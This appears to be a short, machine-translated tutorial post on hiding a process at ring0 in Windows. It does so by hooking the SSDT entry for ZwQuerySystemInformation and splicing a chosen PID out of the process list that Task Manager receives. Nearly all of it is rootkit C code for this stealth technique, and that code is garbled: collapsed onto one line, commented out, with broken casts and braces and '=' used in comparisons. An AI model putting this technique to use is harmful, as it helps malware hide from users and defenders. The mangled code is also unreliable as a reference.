Ring0 to hide Processes

To hide a process under ring0, hook ssdt zwquerysysteminformation. The task manager calls this function to obtain the process object and transmits it to the PID of a process.

// Ntstatus myzwquerysysteminformation // (// _ success, // _ inoutpvoidsysteminformation, // _ inulongsysteminformationlength, // _ out_optpulongreturnlength //) /// {// ntstatus rstatus; // pfnzwquerysysteminformation oldzwinfo =\// (pfnzwquerysysteminformation) systemserviceaddr [getsysfuncindex (zwquerysysteminformation)]; // rstatus = oldzwinfo (systeminformationc) Lass, systeminformation, systeminformationlength, returnlength); // If (nt_success (rstatus) // {// If (systeminformationclass = systemprocessinformation) // {// psystem_processespprevprocessinfo = NULL; // The frontend of the current process // psystem_processespcurrentprocess = (psystem_processes) systeminformation; // while (pcurrentprocess! = NULL) // {// If (pcurrentprocess-> processid = g_hidepid) // {// If (pprevprocessinfo) // {// If (pcurrentprocess-> nextentrydelta) /// {// exclude the process to be hidden from the process chain // pprevprocessinfo-> nextentrydelta + = pcurrentprocess-> nextentrydelta; //} // else // {// the last bit of the excluded process in the chain // pprevprocessinfo-> nextentrydelta = 0; ///} // else // {// If (pcurrentprocess-> nextentrydelta) /// {/// direct systeminformation to the next process structure // systeminformation = (Pulong) systeminformation) + pcurrentprocess-> nextentrydelta; //} // else // {// only one process is available. // systeminformation = NULL; /// // next process // pprevprocessinfo = pcurrentprocess; // If (pcurrentprocess-> nextentrydelta) // {// pcurrentprocess = (psystem_processes) (ulong) pcurrentprocess) + pcurrentprocess-> nextentrydelta); // else // {// pcurrentprocess = NULL; //} // return rstatus ;//}